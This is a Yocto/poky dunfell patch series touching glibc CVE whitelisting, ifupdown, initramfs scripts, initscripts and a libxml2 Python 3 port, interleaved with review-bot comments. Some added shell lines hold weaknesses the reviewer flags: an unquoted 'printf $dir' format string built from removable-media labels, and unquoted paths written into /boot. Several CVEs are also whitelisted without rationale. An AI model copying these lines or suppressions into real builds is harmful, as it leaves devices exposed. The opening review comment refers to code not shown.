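Review bot: `resource.setrlimit(resource.RLIMIT_AS, (limit, limit))` in the `user` branch sets the hard limit as well as the soft one, and Python raises ValueError when the inherited hard limit is already below 8 GB, so the wrapper would abort before running any test on a host with a tighter address-space limit. I would leave the hard limit alone and clamp the soft one: `_, hard = resource.getrlimit(resource.RLIMIT_AS)` followed by `resource.setrlimit(resource.RLIMIT_AS, (limit if hard == resource.RLIM_INFINITY else min(limit, hard), hard))`. Separately, the added `LogLevel=quiet` in the ssh branch hides ssh's own diagnostics on a command that already disables host-key checking, so connection problems will only show up as test failures. A one-line comment stating that this is meant for throwaway test targets would record the intent.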
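diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index b75bbb4196..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
 require glibc.inc
 require glibc-version.inc
 
-CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752"
+CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
+ CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
+ CVE-2022-23218 CVE-2022-23219 \
+"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
+# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
+# "this is being treated as a non-security bug and no real threat."
+CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
+# Allows for ASLR bypass so can bypass some hardening, not an exploit in itself, may allow
+# easier access for another. "ASLR bypass itself is not a vulnerability."
+# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+CVE_CHECK_WHITELIST += "CVE-2019-1010025"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
+# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
+# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
+# an untrusted, crafted pattern, potentially resulting in a denial of service
+# or disclosure of information. Patch was backported to 2.31 branch already:
+# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
+# which is already included in the dunfell branch of poky:
+# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
+CVE_CHECK_WHITELIST += "CVE-2021-35942"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
+# This vulnerability was introduced in 2.36 by commit
+# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
+# so our version is not yet vulnerable
+# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
+CVE_CHECK_WHITELIST += "CVE-2023-4527"
 
 DEPENDS += "gperf-native bison-native make-native"
 
@@ -41,9 +74,21 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
  file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
  file://0028-inject-file-assembly-directives.patch \
  file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
- file://CVE-2020-29562.patch \
  file://CVE-2020-29573.patch \
- file://CVE-2019-25013.patch \
+ file://CVE-2021-33574_1.patch \
+ file://CVE-2021-33574_2.patch \
+ file://CVE-2021-38604.patch \
+ file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
+ file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
+ file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
+ file://0033-elf-Add-test-case-for-BZ-19329.patch \
+ file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
+ file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
+ file://CVE-2023-0687.patch \
+ file://CVE-2023-4911.patch \
+ file://CVE-2023-4813.patch \
  "
 S = "${WORKDIR}/git"
 B = "${WORKDIR}/build-${TARGET_SYS}"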
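Review bot: The first `CVE_CHECK_WHITELIST` assignment now also lists CVE-2021-27645, CVE-2021-3326, CVE-2020-27618, CVE-2020-29562, CVE-2019-25013, CVE-2022-23218 and CVE-2022-23219 with no rationale, while the second hunk drops `CVE-2020-29562.patch` and `CVE-2019-25013.patch` from SRC_URI. Every other whitelist entry added in this section carries a comment saying why the CVE does not apply; these seven do not, so a reader of the cve-check report cannot tell a fixed issue from an ignored one. Presumably they are covered by a newer stable-branch revision pinned in glibc-version.inc, which is not part of this section. If so, a comment above the assignment such as `# Fixed by the 2.31 stable branch revision pinned in glibc-version.inc` would make the suppression auditable.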
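diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
  return 0;
  }
 
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
  /* Print bug-reporting information in the help message. */
  static char *
  more_help (int key, const char *text, void *input)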
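diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
+From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
+From: Simon Schwarz <simon.schwarz@infoteam.de>
+Date: Fri, 6 Nov 2020 08:53:20 +0100
+Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
+ interface
+
+This prevents hangs on startup when no server is available and dhcpv6 is used
+
+Upstream-Status: Pending
+
+Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ inet6.defn | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/inet6.defn b/inet6.defn
+index 73dce24..25022e3 100644
+--- a/inet6.defn
++++ b/inet6.defn
+@@ -29,9 +29,9 @@ method auto
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% up
+ /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (var_true("dhcp", ifd))
+@@ -154,9 +154,9 @@ method dhcp
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% [[address %hwaddress%]] up
+ /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -325,7 +325,7 @@ method dhcp
+
+ up
+ /sbin/ifconfig %iface% [[link %hwaddress%]] up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -397,7 +397,7 @@ method dhcp
+ up
+ [[Warning: Option hwaddress: %hwaddress% not yet supported]]
+ inetutils-ifconfig --interface %iface% --up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+--
+2.17.1
+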
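Review bot: The patch description does not say what happens to an interface once the single attempt fails. As dhclient documents `-1`, the client gives up after one try and exits with an error, so on all five changed `up` lines a DHCPv6 interface whose server appears later stays unconfigured until ifup is run again. That trades the boot hang for a missing address with nothing retrying, which matters for devices reachable only over that link. I would add a sentence to the description, for example `With -1 dhclient exits after the first failed attempt; nothing retries until ifup is run again.`, so integrators know to add their own retry if they need one.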
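diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
 SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
+HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
 DESCRIPTION = "High level tools to configure network interfaces \
 This package provides the tools ifup and ifdown which may be used to \
 configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
 
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
  file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
  file://99_network \
  file://0001-Define-FNM_EXTMATCH-for-musl.patch \
  file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
+ file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
  file://run-ptest \
  ${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
  "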
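diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index f5cc20fa6d..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
 DEPENDS = "zip-native python3-pip-native"
 IMAGE_FSTYPES = "wic.vmdk"
 
-inherit core-image module-base setuptools3
+inherit core-image setuptools3
 
-SRCREV ?= "fadf7d3343305337c38a5243797723c68e88276a"
+SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
 SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
  file://Yocto_Build_Appliance.vmx \
  file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
  # Place the README_VirtualBox_Toaster file in builders home folder.
  cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
 
- # Create a symlink, needed for out-of-tree kernel modules build
- if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
- rm -f ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- fi
-
  echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
  echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
 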
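diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
 
 umount /tgt_root
 
+# copy any extra files needed for ESP
+if [ -d /run/media/$1/esp ]; then
+ cp -r /run/media/$1/esp/* /boot
+fi
+
 # Copy kernel artifacts. To add more artifacts just add to types
 # For now just support kernel types already being used by something in OE-core
 for types in bzImage zImage vmlinux vmlinuz fitImage; do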
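Review bot: `$1` is expanded unquoted in both added lines, and the `esp/*` glob skips dot-files and hands cp a literal `*` when the directory is empty, so the copy misbehaves on exactly the unusual media an installer should cope with. Because this step writes into /boot during installation, I would quote the path and copy the directory contents without a glob: `if [ -d "/run/media/$1/esp" ]; then` and `cp -r "/run/media/$1/esp/." /boot`. The rest of the script lies outside this hunk, so whether `$1` is validated earlier cannot be seen from here.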
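diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
 
  info "Switching root to '$ROOTFS_DIR'..."
 
+ debug "Moving basic mounts onto rootfs"
+ for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
+ # Parse any OCT or HEX encoded chars such as spaces
+ # in the mount points to actual ASCII chars
+ dir=`printf $dir`
+ mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
+ mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
+ done
+
  debug "Moving /dev, /proc and /sys onto rootfs..."
  mount --move /dev $ROOTFS_DIR/dev
  mount --move /proc $ROOTFS_DIR/proc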
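Review bot: The added `printf $dir` call passes the mount point to printf as its format string, unquoted, so a path containing `%` is read as a format directive and the decoded name no longer matches the real mount point. Mount points under /run/media usually take their names from volume labels on removable media, which the system does not control, and the following mkdir and mount then act on the wrong path. Decoding through a fixed format keeps the path as data: `dir=$(printf '%b' "$dir")`, which should still turn the `\040`-style escapes from /proc/mounts into characters in the usual shells. finish_run continues past the end of this hunk.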
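diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
  # It is unlikely to change, but keep trying anyway.
  # Perhaps we pick a different device next time.
  umount $ROOTFS_DIR
- fi
  fi
+ fi
  fi
  debug "Sleeping for $delay second(s) to wait root to settle..."
  sleep $delay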
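diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
 # Copyright (C) 2011 O.S. Systems Software LTDA.
 # Licensed on MIT
 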
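diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
  update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
  update-rc.d -r ${D} sendsigs start 20 0 6 .
  update-rc.d -r ${D} urandom start 38 S 0 6 .
- update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 .
+ update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
  update-rc.d -r ${D} umountfs start 40 0 6 .
  update-rc.d -r ${D} reboot start 90 6 .
  update-rc.d -r ${D} halt start 90 0 .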
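Review bot: Registering `umountnfs.sh` as `stop 31 0 1 6` changes its position relative to its neighbours, and the recipe does not explain why. `sendsigs` (20) and `umountfs` (40) are still `start` links in runlevels 0 and 6, so an rc script that runs K links before S links would now unmount NFS before processes are signalled rather than between the two. If that ordering is intended, a comment above the line, for example `# K link: unmount NFS before the S* shutdown scripts run`, would record it. do_install starts before this hunk, so other registrations are not visible here.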
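diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Keytable files and keyboard utilities"
 HOMEPAGE = "http://www.kbd-project.org/"
+DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
 # everything minus console-fonts is GPLv2+
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"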
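diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
 
 inherit autotools pkgconfig
 
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
 SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
 SRCBRANCH ?= "develop"
 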
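--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
+From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 21 Apr 2022 00:45:58 +0200
+Subject: [PATCH] Port gentest.py to Python 3
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
+
+* fixes:
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 11
+ print "libxml2 python bindings not available, skipping testapi.c generation"
+ ^
+SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 271
+ return 1
+ ^
+TabError: inconsistent use of tabs and spaces in indentation
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
+aarch64-oe-linux-gcc: fatal error: no input files
+compilation terminated.
+make[1]: *** [Makefile:1275: testapi.o] Error 1
+
+But there is still a bit mystery why it worked before, because check-am
+calls gentest.py with $(PYTHON), so it ignores the shebang in the script
+and libxml2 is using python3native (through python3targetconfig.bbclass)
+so something like:
+
+libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
+
+But that still fails (now without SyntaxError) with:
+libxml2 python bindings not available, skipping testapi.c generation
+
+because we don't have dependency on libxml2-native (to provide libxml2
+python bindings form python3native) and exported PYTHON_SITE_PACKAGES
+might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
+which uses python 3.10 and there is no site-packages with libxml2)
+
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ gentest.py | 421 ++++++++++++++++++++++++++---------------------------
+ 1 file changed, 209 insertions(+), 212 deletions(-)
+
+diff --git a/gentest.py b/gentest.py
+index b763300..0756706 100755
+--- a/gentest.py
++++ b/gentest.py
+@@ -8,7 +8,7 @@ import string
+ try:
+ import libxml2
+ except:
+- print "libxml2 python bindings not available, skipping testapi.c generation"
++ print("libxml2 python bindings not available, skipping testapi.c generation")
+ sys.exit(0)
+
+ if len(sys.argv) > 1:
+@@ -227,7 +227,7 @@ extra_post_call = {
+ if (old != NULL) {
+ xmlUnlinkNode(old);
+ xmlFreeNode(old) ; old = NULL ; }
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlTextMerge":
+ """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
+ xmlUnlinkNode(second);
+@@ -236,7 +236,7 @@ extra_post_call = {
+ """if ((ret_val != NULL) && (ret_val != ncname) &&
+ (ret_val != prefix) && (ret_val != memory))
+ xmlFree(ret_val);
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlNewDocElementContent":
+ """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
+ "xmlDictReference": "xmlDictFree(dict);",
+@@ -268,29 +268,29 @@ modules = []
+ def is_skipped_module(name):
+ for mod in skipped_modules:
+ if mod == name:
+- return 1
++ return 1
+ return 0
+
+ def is_skipped_function(name):
+ for fun in skipped_functions:
+ if fun == name:
+- return 1
++ return 1
+ # Do not test destructors
+- if string.find(name, 'Free') != -1:
++ if name.find('Free') != -1:
+ return 1
+ return 0
+
+ def is_skipped_memcheck(name):
+ for fun in skipped_memcheck:
+ if fun == name:
+- return 1
++ return 1
+ return 0
+
+ missing_types = {}
+ def add_missing_type(name, func):
+ try:
+ list = missing_types[name]
+- list.append(func)
++ list.append(func)
+ except:
+ missing_types[name] = [func]
+
+@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
+ missing_functions_nr = missing_functions_nr + 1
+ try:
+ list = missing_functions[module]
+- list.append(name)
++ list.append(name)
+ except:
+ missing_functions[module] = [name]
+
+@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
+ #
+
+ def type_convert(str, name, info, module, function, pos):
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+- res = string.replace(str, " *", "_ptr")
+-# res = string.replace(str, "*", "_ptr")
+- res = string.replace(res, " ", "_")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++ res = str.replace(" *", "_ptr")
++# res = str.replace("*", "_ptr")
++ res = res.replace(" ", "_")
+ if res == 'const_char_ptr':
+- if string.find(name, "file") != -1 or \
+- string.find(name, "uri") != -1 or \
+- string.find(name, "URI") != -1 or \
+- string.find(info, "filename") != -1 or \
+- string.find(info, "URI") != -1 or \
+- string.find(info, "URL") != -1:
+- if string.find(function, "Save") != -1 or \
+- string.find(function, "Create") != -1 or \
+- string.find(function, "Write") != -1 or \
+- string.find(function, "Fetch") != -1:
+- return('fileoutput')
+- return('filepath')
++ if name.find("file") != -1 or \
++ name.find("uri") != -1 or \
++ name.find("URI") != -1 or \
++ info.find("filename") != -1 or \
++ info.find("URI") != -1 or \
++ info.find("URL") != -1:
++ if function.find("Save") != -1 or \
++ function.find("Create") != -1 or \
++ function.find("Write") != -1 or \
++ function.find("Fetch") != -1:
++ return('fileoutput')
++ return('filepath')
+ if res == 'void_ptr':
+ if module == 'nanoftp' and name == 'ctx':
+- return('xmlNanoFTPCtxtPtr')
++ return('xmlNanoFTPCtxtPtr')
+ if function == 'xmlNanoFTPNewCtxt' or \
+- function == 'xmlNanoFTPConnectTo' or \
+- function == 'xmlNanoFTPOpen':
+- return('xmlNanoFTPCtxtPtr')
++ function == 'xmlNanoFTPConnectTo' or \
++ function == 'xmlNanoFTPOpen':
++ return('xmlNanoFTPCtxtPtr')
+ if module == 'nanohttp' and name == 'ctx':
+- return('xmlNanoHTTPCtxtPtr')
+- if function == 'xmlNanoHTTPMethod' or \
+- function == 'xmlNanoHTTPMethodRedir' or \
+- function == 'xmlNanoHTTPOpen' or \
+- function == 'xmlNanoHTTPOpenRedir':
+- return('xmlNanoHTTPCtxtPtr');
++ return('xmlNanoHTTPCtxtPtr')
++ if function == 'xmlNanoHTTPMethod' or \
++ function == 'xmlNanoHTTPMethodRedir' or \
++ function == 'xmlNanoHTTPOpen' or \
++ function == 'xmlNanoHTTPOpenRedir':
++ return('xmlNanoHTTPCtxtPtr');
+ if function == 'xmlIOHTTPOpen':
+- return('xmlNanoHTTPCtxtPtr')
+- if string.find(name, "data") != -1:
+- return('userdata')
+- if string.find(name, "user") != -1:
+- return('userdata')
++ return('xmlNanoHTTPCtxtPtr')
++ if name.find("data") != -1:
++ return('userdata')
++ if name.find("user") != -1:
++ return('userdata')
+ if res == 'xmlDoc_ptr':
+ res = 'xmlDocPtr'
+ if res == 'xmlNode_ptr':
+@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'xmlDictPtr'
+ if res == 'xmlNodePtr' and pos != 0:
+ if (function == 'xmlAddChild' and pos == 2) or \
+- (function == 'xmlAddChildList' and pos == 2) or \
++ (function == 'xmlAddChildList' and pos == 2) or \
+ (function == 'xmlAddNextSibling' and pos == 2) or \
+ (function == 'xmlAddSibling' and pos == 2) or \
+ (function == 'xmlDocSetRootElement' and pos == 2) or \
+ (function == 'xmlReplaceNode' and pos == 2) or \
+ (function == 'xmlTextMerge') or \
+- (function == 'xmlAddPrevSibling' and pos == 2):
+- return('xmlNodePtr_in');
++ (function == 'xmlAddPrevSibling' and pos == 2):
++ return('xmlNodePtr_in');
+ if res == 'const xmlBufferPtr':
+ res = 'xmlBufferPtr'
+ if res == 'xmlChar_ptr' and name == 'name' and \
+- string.find(function, "EatName") != -1:
++ function.find("EatName") != -1:
+ return('eaten_name')
+ if res == 'void_ptr*':
+ res = 'void_ptr_ptr'
+@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'debug_FILE_ptr';
+ if res == 'int' and name == 'options':
+ if module == 'parser' or module == 'xmlreader':
+- res = 'parseroptions'
++ res = 'parseroptions'
+
+ return res
+
+@@ -402,28 +402,28 @@ known_param_types = []
+ def is_known_param_type(name):
+ for type in known_param_types:
+ if type == name:
+- return 1
++ return 1
+ return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
+
+ def generate_param_type(name, rtype):
+ global test
+ for type in known_param_types:
+ if type == name:
+- return
++ return
+ for type in generated_param_types:
+ if type == name:
+- return
++ return
+
+ if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
+ if rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
+
+ define = 0
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""
+ #define gen_nb_%s 1
+ static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
+ }
+ """ % (name, crtype, name, name, rtype))
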